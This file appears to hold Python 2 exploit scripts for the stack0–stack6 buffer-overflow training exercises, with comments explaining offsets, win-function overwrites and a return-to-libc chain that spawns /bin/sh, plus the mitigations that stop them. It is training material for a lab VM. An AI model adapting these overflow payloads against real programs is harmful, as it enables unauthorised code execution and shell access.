#(python /tmp/stack6.py;cat) | ./stack6
from struct import pack,unpack
 
# Python 2 script (print statement; str is a byte string).
# Emits the stdin input for the stack6 target named in the invocation comment
# at the top of this script.
#
# Bytes written, in order:
#   "A" * 80    filler
#   p(system)   4 bytes, little-endian
#   'AAAA'      4 placeholder bytes
#   p(binsh)    4 bytes, little-endian
#
# NOTE(review): this is the return-to-libc shape. Presumably 80 is the distance
# to the saved return address, `system` is libc's system() and `binsh` a
# "/bin/sh" string as mapped in the target process -- the file itself does not
# establish any of that; confirm against the target.
# Both addresses are hard-coded, so the input only lines up where the target's
# memory layout is identical on every run (ASLR off, as on a training VM).
# ASLR, stack canaries and bounded reads in the target are the controls that
# stop this class of input from working.


def p(x):
    """Pack x as a 4-byte little-endian unsigned integer ("<L")."""
    return pack("<L", x)


def up(x):
    """Unpack 4 little-endian bytes to an unsigned integer (not used below)."""
    return unpack("<L", x)[0]


system = 0xb7ecffb0
binsh = 0xb7fb63bf

payload = "".join((
    "A"*80,
    p(system),
    'AAAA',
    p(binsh),
))

print payload



#(python /tmp/stack5.py;cat) | ./stack5
from struct import pack,unpack
 
# Python 2 script (print statement; str is a byte string).
# Produces the stdin input for the stack5 target shown in the invocation
# comment at the top of this script.
#
# Output layout: 76 filler bytes, then `system`, a 4-byte "AAAA" placeholder
# and `binsh`, each address packed as a 32-bit little-endian value.
#
# NOTE(review): presumably 76 is the offset to the saved return address and the
# two constants are libc's system() and a "/bin/sh" string in the target's
# address space -- inferred from the names only; confirm against the target.
# The constants are fixed, so this depends on a non-randomised layout (ASLR
# disabled). ASLR and a stack protector in the target both break it.


def p(x):
    """Return x encoded as 4 little-endian bytes (struct format "<L")."""
    return pack("<L", x)


def up(x):
    """Decode 4 little-endian bytes back to an integer (unused in this script)."""
    return unpack("<L", x)[0]


system = 0xb7ecffb0
binsh = 0xb7fb63bf

payload = "".join((
    "A"*76,
    p(system),
    "AAAA",
    p(binsh),
))

print payload


#(python /tmp/stack4.py;cat) | ./stack4
from struct import pack,unpack
 
# Python 2 script (print statement; str is a byte string).
# Builds the stdin input for the stack4 target from the invocation comment at
# the top of this script: 76 filler bytes followed by `win_func` packed as a
# 32-bit little-endian value.
#
# NOTE(review): presumably `win_func` is the address of a function inside the
# target binary and 76 the distance from the buffer to the saved return
# address -- neither is shown here; confirm against the target.
# A fixed code address only holds for a binary loaded at the same base every
# time; a position-independent build with ASLR, or a stack canary, would make
# this input fail.


def p(x):
    """Pack x as a 4-byte little-endian unsigned integer ("<L")."""
    return pack("<L", x)


def up(x):
    """Inverse of p(): 4 little-endian bytes to an integer (not used below)."""
    return unpack("<L", x)[0]


win_func = 0x080483f4

payload = "".join(("A"*76, p(win_func)))

print payload

#(python /tmp/stack3.py;cat) | ./stack3
from struct import pack,unpack
 
# Python 2 script (print statement; str is a byte string).
# Builds the stdin input for the stack3 target from the invocation comment at
# the top of this script: 64 filler bytes, then `win_func` as a 32-bit
# little-endian value.
#
# NOTE(review): presumably the target keeps a code pointer directly after a
# 64-byte buffer and `win_func` is a function address inside that binary --
# inferred, not shown in this file; confirm against the target.
# Defensive reading: an unbounded copy next to a function pointer lets input
# choose the call target; bounding the copy removes the problem at the source.


def p(x):
    """Return x encoded as 4 little-endian bytes (struct format "<L")."""
    return pack("<L", x)


def up(x):
    """Decode 4 little-endian bytes back to an integer (unused in this script)."""
    return unpack("<L", x)[0]


win_func = 0x08048424

payload = "".join(("A"*64, p(win_func)))

print payload


#export GREENIE=$(python /tmp/stack2.py)
#./stack2

# Python 2 script (print statement). Its output is captured into the GREENIE
# environment variable before ./stack2 is run (see the two commented shell
# lines above).
#
# 64 filler bytes, then the bytes 0a 0d 0a 0d; read as a little-endian 32-bit
# integer those four bytes are 0x0d0a0d0a.
# NOTE(review): presumably the target copies GREENIE into a 64-byte stack
# buffer without a length check, so the trailing bytes land in the adjacent
# variable -- confirm against the stack2 source.
# Environment variables are caller-controlled input and need the same length
# checks as argv or stdin.
payload = "A"*64 + "\x0a\x0d\x0a\x0d"

print payload


#./stack1 "$(python /tmp/stack1.py)"

# Python 2 script (print statement). Its output is passed to ./stack1 as the
# first command-line argument (see the commented shell line above).
#
# 64 filler bytes, then "dcba" (bytes 64 63 62 61), which a little-endian
# 32-bit read interprets as 0x61626364.
# NOTE(review): presumably the target copies argv[1] into a 64-byte buffer
# with no bound and then compares the neighbouring variable to that value --
# confirm against the stack1 source.
payload = "A"*64 + "dcba"

print payload

#(python /tmp/stack0.py;cat) | ./stack0

# Python 2 script (print statement). Its output is piped to ./stack0 on stdin
# (see the commented shell line above).
#
# 64 filler bytes, then ef be ad de, i.e. 0xdeadbeef when read as a
# little-endian 32-bit integer.
# NOTE(review): presumably the target reads stdin into a 64-byte buffer with no
# bound, so bytes 65-68 overwrite the variable stored after it -- confirm
# against the stack0 source.
payload = "A"*64 + "\xef\xbe\xad\xde"

print payload
